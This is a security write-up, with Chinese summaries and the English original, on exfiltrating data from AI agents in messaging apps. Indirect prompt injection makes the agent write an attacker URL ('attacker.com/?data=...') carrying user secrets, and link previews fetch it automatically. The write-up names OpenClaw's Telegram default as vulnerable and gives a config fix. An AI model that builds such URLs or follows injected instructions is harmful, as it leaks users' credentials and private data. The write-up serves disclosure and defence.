特工通过消息应用程序的数据泄露

特工通过消息应用程序的数据泄露
Data exfil from agents in messaging apps

原始链接: https://www.promptarmor.com/resources/llm-data-exfiltration-via-url-previews-(with-openclaw-example-and-test)

## AI 代理系统中的数据泄露风险由 AI 驱动的代理系统（例如在 Telegram 和 Slack 等应用程序中使用 LLM 的系统）容易受到一种新的数据泄露技术的影响，该技术利用**链接预览**。攻击者可以操纵代理生成恶意链接，将敏感用户数据作为 URL 参数包含在内。传统上，这需要用户*点击*链接才能泄露数据。然而，应用程序会自动获取**链接预览**——无需用户交互，就向攻击者的服务器发出网络请求。这使得在代理响应后立即盗取数据成为可能。研究人员发现 OpenClaw 在默认 Telegram 设置下存在漏洞，但可以通过在其配置文件中禁用链接预览轻松修复。一个测试站点 [AITextRisk.com](https://aitextrisk.com/) 允许用户检查他们的系统是否通过预览泄露数据，并识别有风险的应用程序/代理组合。问题源于应用程序自动预览 URL。解决方案要求通信应用程序向开发人员公开预览设置，并且代理开发人员尊重这些设置——或者为用户提供控制权。这凸显了一个关键的安全漏洞，因为代理系统变得越来越普及。

## AI 消息代理中的数据泄露风险最新研究表明存在一个显著的安全漏洞：集成到消息应用程序中的 AI 代理可能被利用通过 URL 预览“展开”功能进行数据泄露。当代理浏览恶意链接时，由此产生的预览请求（由消息应用程序触发的 HTTP 请求）可能会无意中将敏感数据发送给攻击者——绕过典型的用户意图检查。这并非仅限于像 OpenClaw 这样的特定框架，后者*确实*设计了沙箱和确认提示等安全措施。核心问题在于协议本身：将 URL 解析视为不受信任的输入至关重要。生产部署应利用网络策略来阻止意外的数据传输。研究人员指出这是一个“协议层面问题”，由于消息预览的盲目性，形成了一个完美的泄露通道。进一步的研究（评论中提供了链接）详细说明了展开的危险以及潜在的缓解措施。最后，值得注意的是，可能通过在相关页面上发送垃圾信息来故意破坏。

原文

A basic technique for exfiltrating data from LLM-based applications via indirect prompt injection is to manipulate the model into outputting an attacker-controlled link with sensitive user data appended to the URL. If the link is clicked, the data is stolen.

By querying AI agents via apps (like Telegram and Slack), users can unknowingly enable a more severe attack. These apps support ‘previews’ for links found in messages; link previews make the same type of network request as clicking a link - with no user clicks required. This means that in agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link.

In this article, we walk through the attack chain and provide a test you can try to validate whether the agentic systems you use are at risk. OpenClaw (the current trending agentic system) is vulnerable to this attack when using the default Telegram configuration; an example secure configuration is provided at the end of the article. We believe insecure previews are likely to affect many other agentic systems as well.

Through this article, we aim to raise awareness of this risk. We hope to see a future in which the typical agentic system benefits from mitigations supported by both those developing agents and those developing the interfaces into which agents are integrated.

The Attack Chain

An indirect prompt injection in an untrusted data source manipulates an AI model into returning a malicious URL containing sensitive data. When the URL is previewed, the data is exfiltrated.

Historically, messaging and collaboration apps have supported URL previews in order to display metadata such as thumbnails, titles, and descriptions for links shared by users.

Model of a phone showing a link preview generated for Example.com.

With LLMs, this becomes dangerous. Indirect prompt injections can manipulate AI agents to include malicious URLs in their response to users. In this attack, the agent is manipulated to construct a URL that uses an attacker’s domain, with dynamically generated query parameters appended that contain sensitive data the model knows about the user.

attacker.com/?data={AI APPENDS SENSITIVE DATA HERE}

Model of a mobile device rendering a URL preview of a malicious URL (from an attacker's site with the user's sensitive data appended as query parameters).

When an AI agent sends a message to the user containing a malicious URL, if the URL is not previewed, the attack requires the user to click the malicious link, which triggers a network request to the attacker’s server (thereby exposing data stored in the URL). However, if the URL is previewed, a request is made to the attacker’s domain to retrieve metadata for the preview – without requiring any user interaction. After the preview request is made, the attacker can read their request logs to see the sensitive user data the model appended to the preview request URL.

Testing website shows insecure previews requested, including a log containing a name and API key.

Secure OpenClaw Telegram Configuration

For users communicating with OpenClaw using Telegram, there is an explicit configuration you can use to disable link previews! Try the experiment from above again after disabling link previews, and you’ll see that data is no longer sent to AITextRisk.com!

In the file ~/.openclaw/openclaw.json, add the line linkPreview: false in the channels > telegram object.

Secure recommended configuration file for OpenClaw Telegram users with linkPreview set to `false`.

Test Results

On AITextRisk.com, you can see when one of your agentic systems has created a preview of the site, and what data was passed through the preview request. We’ve also included a graph of the most seen scrapers used to create URL previews (such as Slackbot, Telegram bot, etc.). Furthermore, people can 'claim' their logs to report what agent was responsible; this powers a display of the most risky agent/app combinations. We also allow users to report agentic systems that they have tested that did not create the preview, providing data for a display of which agentic systems do not appear to insecurely preview links. As a whole, this allows you to test whether the agentic systems you use generate insecure previews for URLs in LLM-generated messages.

Many agentic systems are being integrated into many apps. It falls on communication apps to expose link preview preferences to developers, and agent developers to leverage the preferences provided (or give the choice to the end user!). We’d like to see communication apps consider supporting custom link preview configurations on a chat/channel-specific basis to create LLM-safe channels.